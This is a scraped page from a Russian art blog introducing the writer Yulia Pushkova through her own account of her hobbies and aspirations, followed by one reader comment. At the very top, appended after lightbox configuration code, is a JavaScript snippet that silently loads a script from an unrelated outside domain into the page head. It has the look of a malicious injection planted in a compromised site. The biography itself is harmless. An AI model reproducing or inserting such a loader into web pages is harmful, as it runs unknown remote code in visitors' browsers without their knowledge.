, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

«Художник пера» Юлия Пушкова

Автор: Дмитрий Алмазов | 29 Дек 2010

Здравствуйте посетители моего сайта, хочу Вам представить «Художника пера» писателя,  замечательного человека и участника проекта «Лаборатория Искусства» - это Юлия Пушкова. Если Вы уже обратили внимание, она является автором замечательных статей, в которых лаконично и интересно рассказывает о том, что происходит или было в мире искусства.

Вот, что Юлия хочет рассказать о себе:

«Моя основная деятельность далека от литературы и искусства. Но я считаю, что человек не должен замыкаться в рамках своего образования или профессиональных обязанностей. Мне нравится открывать новые горизонты. Вот уже несколько лет я пробую свои силы в писательстве. Сейчас это мое главное и любимое хобби. Мечтаю в будущем создать полноценное литературное произведение, а пока набираюсь опыта!

Для меня мир – прекрасен и многогранен. Природа – его самое живое и динамичное отражение. Я никогда не устаю любоваться закатом или бескрайней гладью моря, слушать тишину леса. Из живописи мне близок импрессионизм в целом и картины русских художников "золотого" века.

Мне нравится тихий размеренный темп сельской жизни. И еще одна моя мечта – жить вдали от города.

Среди своих увлечений могу назвать фотографию, путешествия, занятия спортом, кулинарию, общение с интересными людьми.

Стараюсь не зацикливаться на своих успехах, а ставить перед собой новые цели, расти в профессиональном и человеческом плане. Верю, что самые главные достижения у меня еще впереди.»

Давайте поддержим Юлию!

Вы можете оставлять комментарии, пожелания в конце каждой интересной статьи.

Подписаться на RSS рассылку новых статей!

Темы: Школа искусства | 1 отзыв »

Один отзыв на “«Художник пера» Юлия Пушкова”

  1. Михаил пишет:
    02 Янв 2011 в 13:07

    Давайте, поддержим Юлию!
    Юлия, если Вы действительно пишете интересные статьи по искусству, Вы могли бы попробовать силы в новом литературном жанре – художественной критике.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress